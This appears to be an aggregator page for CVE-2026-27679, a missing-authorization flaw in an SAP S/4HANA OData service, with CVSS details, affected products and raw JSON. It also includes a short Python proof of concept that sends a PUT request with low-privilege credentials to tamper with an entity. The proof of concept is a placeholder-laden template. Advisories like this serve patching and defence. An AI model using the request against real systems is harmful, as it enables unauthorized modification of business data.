Security Vulnerability Report
中文
CVE-2026-27679 CVSS 6.5 MEDIUM

CVE-2026-27679

Published: 2026-04-14 00:16:06
Last Modified: 2026-05-04 14:58:27

Description

Due to missing authorization checks in the SAP S/4HANA frontend OData Service (Manage Reference Structures), an attacker could update and delete child entities via exposed OData services without proper authorization. This vulnerability has a high impact on integrity, while confidentiality and availability are not impacted.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:sap:manage_reference_structures:uis4h_109:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sap:s\/4hana:-:*:*:*:*:*:*:* - NOT VULNERABLE
SAP S/4HANA (具体受影响版本请参考 SAP Note 3716767)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # SAP S/4HANA OData Service PoC # Description: Exploits missing authorization to update a child entity target_url = "https://<target-host>/sap/opu/odata/sap/Z_MANAGE_REF_STRUCTURES/EntitySet('<ID>')" headers = { "Content-Type": "application/json", "Authorization": "Basic <low_privilege_credentials>" } # Malicious payload to update data payload = { "PropertyToChange": "MaliciousValue" } try: response = requests.request("PUT", target_url, headers=headers, json=payload, verify=False) if response.status_code == 200 or response.status_code == 204: print("[+] Vulnerability exploited! Entity updated successfully.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27679", "sourceIdentifier": "[email protected]", "published": "2026-04-14T00:16:06.413", "lastModified": "2026-05-04T14:58:27.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to missing authorization checks in the SAP S/4HANA frontend OData Service (Manage Reference Structures), an attacker could update and delete child entities via exposed OData services without proper authorization. This vulnerability has a high impact on integrity, while confidentiality and availability are not impacted."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sap:manage_reference_structures:uis4h_109:*:*:*:*:*:*:*", "matchCriteriaId": "AFB5A6C3-F943-49C4-BA93-DC4E74B5E8FA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:a:sap:s\\/4hana:-:*:*:*:*:*:*:*", "matchCriteriaId": "61225714-D573-435F-9423-7AE6A8ED59BC"}]}]}], "references": [{"url": "https://me.sap.com/notes/3716767", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]", "tags": ["Permissions Required"]}]}}